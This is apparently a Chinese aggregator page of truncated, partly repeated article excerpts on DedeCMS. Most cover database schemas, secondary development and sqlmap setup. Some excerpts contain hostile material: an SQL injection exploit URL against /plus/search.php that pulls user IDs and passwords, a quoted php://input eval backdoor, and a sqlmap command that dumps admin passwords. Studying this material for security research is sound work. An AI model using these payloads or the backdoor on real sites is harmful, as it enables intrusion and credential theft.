dede_addonarticle 附加文章表 aid int(11) 文章编号typeid int(11) 分类栏目编号body mediumtext 文章内容dede_addonflash 附加Flash表aid int(11) FLASH编号typeid int(11) 分类栏目编号filesize varchar(10) 文件大小playtime varchar(10) 播放时长flashtype varchar(10) 作品类型flashrank smallint(6) 作品等级wid…

我们在用dedecms建站时,安装一般都“下一步”直接往下点,这样默认的表前缀是dede_,如果我们要还原从其他地方拷贝过来的数据,一定要注意表头是否一致.如果表头不一样怎么办呢?有两种方法,第一种,通过数据库批量修改表前缀,不熟悉数据库的朋友不建议操作:第二种,修改备份的文件,本文以第二种为例 第一步,打开备份文件,一般是在/dede/data/backupdata/目录,把所有文件(index.html和tables_struct_***.txt除外)重命名,比如dede_改为“hshx_”…

我们在上一篇文章中学习了DEDECMS的模板标签.模板解析原理,以及通过对模板核心类的Hook Patch来对模板的解析流量的攻击模式检测,达到修复模板类代码执行漏洞的目的 http://www.cnblogs.com/LittleHann/p/3574694.html 通过这段时间的思考,我大概对目前CMS中主流的WEB漏洞进行了大致的分类,这里给朋友们分享一些我的想法: ) 本地变量覆盖类型的漏洞: 在common.inc.php这种本地变量注册的关口进行流量监控,通过正则规则,防止黑客通过…

//dedecms的数据库操作类说明,非常实用,在二次开发中尤其重要.//引入common.inc.php文件require_once (dirname(__FILE__) . "/include/common.inc.php");//引用DEDECMS的公共文件 //获取一条记录的内容$row = $dsql->GetOne("Select * From dede_* where id = $aid");echo $row['id']; //将查询获取总数输…

本文主要是为了今后对Dedecms做二次开发所写.安装后dedecms的数据库结构,如(图1)所示, 安装后的dedecms一共有 86 张数据表. 主要数据结构表 dede_addonarticle:附加文章表  aid int(11) 文章编号  typeid int(11) 分类栏目编号  body mediumtext 文章内容  dede_addonflash 附加Flash表  aid int(11) FLASH编号  typeid int(11) 分类栏目编号  filesize…

表名:dede_addonarticle (ENGINE=MyISAM/CHARSET=gbk) 说明:Top 字段名 说明描述 具体参数 aid 文章ID mediumint(8) unsigned NOT NULL default '0' typeid 栏目ID smallint(5) unsigned NOT NULL default '0' body 内容 mediumtext redirecturl 跳转URL varchar(255) NOT NULL default '' temp…

dede_addonarticle 附加文章表 aid int(11) 文章编号 typeid int(11) 分类栏目编号 body mediumtext 文章内容 dede_addonflash 附加Flash表 aid int(11) FLASH编号 typeid int(11) 分类栏目编号 filesize varchar(10) 文件大小 playtime varchar(10) 播放时长 flashtype varchar(10) 作品类型 flashrank smallint(6…

找到 然后把命令放在 执行即可,慎重执行 替换文章标题 UPDATE `dede_archives` SET `title`=replace(title,'我我我','你你你') 替换文章正文 UPDATE `dede_addonarticle` SET `body`=replace(body,'我我我','你你你') 替换文章描述 UPDATE `dede_archives` SET `description`=replace(description,'我我我','你你你') 把我我我替换为你…

catalog . 安装及使用方式 . 检查DEDECMS是否为最新版本 . 检查默认安装(install)目录是否存在 . 检查默认后台目录(dede)是否存在 . 检查DedeCMS会员中心是否关闭 . 检查是否存在高风险的若密码账户 . 后台友情链接xss漏洞 . /plus/search.php SQL注入漏洞 . /plus/feedback.php SQL注入漏洞 . /plus/feedback_ajax.php SQL注入或XSS漏洞漏洞 . /include/dedesql.c…

目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 对于这个漏洞,我们可以简单概括如下 . "/plus/download.php"文件会引入"/include/common.inc.php"文件 . "/include/common.inc.php"中会对用户输入的变量进行"变量本地注册",如果注册的变量未被显式地初始化,则会导致本地变量覆盖 . "…

dedecms的数据库操作类,非常实用,在二次开发中尤其重要,这个数据库操作类说明算是奉献给大家的小礼物了. 引入common.inc.php文件 require_once (dirname(__FILE__) . "/include/common.inc.php"); 获取一条记录的内容 $row = $dsql->GetOne("Select * From dede_* where id = $aid"); echo $row['id']; 将查询获取总数…

dedecms的数据库操作类,非常实用,在二次开发中尤其重要,这个数据库操作类说明算是奉献给大家的小礼物了. 引入common.inc.php文件 require_once (dirname(__FILE__) . "/include/common.inc.php"); 获取一条记录的内容 $row = $dsql->GetOne("Select * From dede_* where id = $aid"); echo $row['id']; 将查询获取总数…

http://www.cnblogs.com/xcxc/p/3601909.html dedecms的数据库操作类,非常实用,在二次开发中尤其重要,这个数据库操作类说明算是奉献给大家的小礼物了. 引入common.inc.php文件 1 require_once (dirname(__FILE__) . "/include/common.inc.php"); 获取一条记录的内容 1 2 $row = $dsql->GetOne("Select * From dede_*…

一些功能可能dedecms没有,这个时候可以自己写一些函数: 1.打开inlude->extend.func.php,将函数写到里面 比如:前台: [field:id function="extent_test(@me)”/]  @me表示id内容    php页面中: function extent_test($tid){       global $dsql;       $sql="SELECT count(aid) from dede_addon17 where type…

前文介绍了DedeCMS栏目列表页实现完美分页的方法,避免了大部分重复栏目标题对搜索引擎的影响,对SEO更有利.今天,分享一下DedeCMS数据负载性能优化的方法. 接触织梦也有三年多时间了,对它可谓是又爱又恨.它的模板简单易用,标签调用更是灵活,二次开发也非常方便.可是,站点数据庞大起来的时候(30多 万条),后台就会变得异常缓慢,生成HTML也很吃力,毫不夸张的说,头发都等白了.这不禁让我对DedeCMS数据负载性能产生了置疑? 查阅了相关资料,结合自身站点实际,还是总结出了一套不错的Ded…

[通杀]dedecms plussearch.php 注入漏洞利用方式看结果如果提示Safe Alert: Request Error step 2 !那么直接用下面的exp查看源代码打印帮助1 /plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,3…

dede数据库类使用方法 $dsql   dedecms的数据库操作类,非常实用,在二次开发中尤其重要,这个数据库操作类说明算是奉献给大家的小礼物了. 引入common.inc.php文件 ? 1 require_once (dirname(__FILE__) . "/include/common.inc.php"); 获取一条记录的内容 ? 1 2 $row = $dsql->GetOne("Select * From dede_* where id = $aid&q…

http://www.dedecms.com/help/development/2009/1028/1076.html 织梦DedeCMS的二次开发不仅仅是会写写织梦的标签,会制作织梦的模板.很多时候,我们需要对织梦DedeCMS的数据库进行查询.插入.删除等等之类的操作,进行这一类的操作之前,我们必须知道织梦DedeCMS的数据库类,No牛网整理了织梦天涯版主关于DedeCMS程序的dedesql类常见的用法讲解的文章,希望有朋友用的上. 1.创建数据表 为了让讲解更加的贴合实际,天涯版主创建…

本文转载:http://www.mubanzhijia.com/jishujiaocheng/1.html 关键描述调用标签: <meta name="keywords" content="{dede:field name='keywords'/}"><meta name="description" content="{dede:field name='description' function='html2text(…

SSV-97074 Date 类型 前台任意密码修改 影响范围 前置条件 CVE-2018-20129 Date 类型前台文件上传 影响范围 前置条件(1)前台登录(2)/member/article_add.php可访问 SSV-97087 Date 类型越权 影响范围 前置条件(1)有前台登录账号 CVE-2018-9175 Date 类型 影响范围 前置条件(1)可登录后台 /member/reg_new.php SQL 注入漏洞 /member/buy_action.php SQL 注入…

一.php://input一句话木马 在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马) @eval(file_get_contents('php://input')) 我是个十足的php菜鸟,只有用到的时候才会去查查语法书,对php://input也只是有点印象而已,于是用脚本phpinput.php,配合firefox Hackbar插件测试了一下php://in…

◆二次开发 1.什么是二次开发? 二次开发,简单的说就是在现有的软件上进行定制修改,功能的扩展,然后达到自己想要的功能和效果,一般来说都不会改变原有系统的内核. 2.为什么要二次开发? 随着信息化技术的不断发展,IT行业涌现出了一系列优秀的开源作品,其作者或是个人,或是项目小组,或是软件公司.选择和应用这些优秀的开源软件,并在此基础上进行符合业务需求的二次开发,将给企业节省信息化成本(时间成本及开发成本)的同时,更能带来技术上的保障.这就是我们常听的:站在巨人的肩膀上,你将看的更远.所以国内很多…

本文介绍一下Sqlmap的安装跟配置环境变量. 顺便附上一些常用的命令 SQLMAP-64位.Python 下载链接:http://pan.baidu.com/s/1c0D82fm 密码:d7ec Python的安装一路默认就好,然后把Sqlmap解压. 这里以我电脑为例,进到sqlmap目录里,复制路径.(不要有中文字符存在) 然后右键我的电脑,属性,选择高级系统设置 选环境变量 在系统变量里找到Path.然后编辑,在最前方输入我们刚才复制的路径,然后后面加一个英文的分号——“;” 然后 保存…

sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了.今天把我一直以来整理的sqlmap笔记发布上来供大家参考. 一共有11种常见SQLmap使用方法: 一.SQLMAP用于Access数据库注入 (1) 猜解是否能注入 1 2 win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=…

sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了.今天把我一直以来整理的sqlmap笔记发布上来供大家参考. 表内查找字段 从数据库中搜索字段sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms   - -search -C admin,password --dump 一共有11种常见SQLmap使用方…

sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了. 今天把我一直以来整理的sqlmap笔记发布上来供大家参考. sqlmap简介 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可以根据返回页面判断条件真假的注入. 2.基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断. 3.基于…

sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了.今天把我一直以来整理的sqlmap笔记发布上来供大家参考. 一共有11种常见SQLmap使用方法: 一.SQLMAP用于Access数据库注入 (1) 猜解是否能注入 1 2 win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=…

sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了. 今天把我一直以来整理的sqlmap笔记发布上来供大家参考 sqlmap简介 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可以根据返回页面判断条件真假的注入. 2.基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断. 3.基于报…

◆二次开发 什么是二次开发? 二次开发,简单的说就是在现有的软件上进行定制修改,功能的扩展,然后达到自己想要的功能和效果,一 般来说都不会改变原有系统的内核. 为什么要二次开发? 随着信息化技术的不断发展,IT行业涌现出了一系列优秀的开源作品,其作者或是个人,或是项目小组,或 是软件公司.选择和应用这些优秀的开源软件,并在此基础上进行符合业务需求的二次开发,将给企业节省信息 化成本(时间成本及开发成本)的同时,更能带来技术上的保障.这就是我们常听的:站在巨人的肩膀上,你将看 的更远.所以国内很多…

sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了. 今天把我一直以来整理的sqlmap笔记发布上来供大家参考. sqlmap简介 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可以根据返回页面判断条件真假的注入. 2.基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断. 3.基于…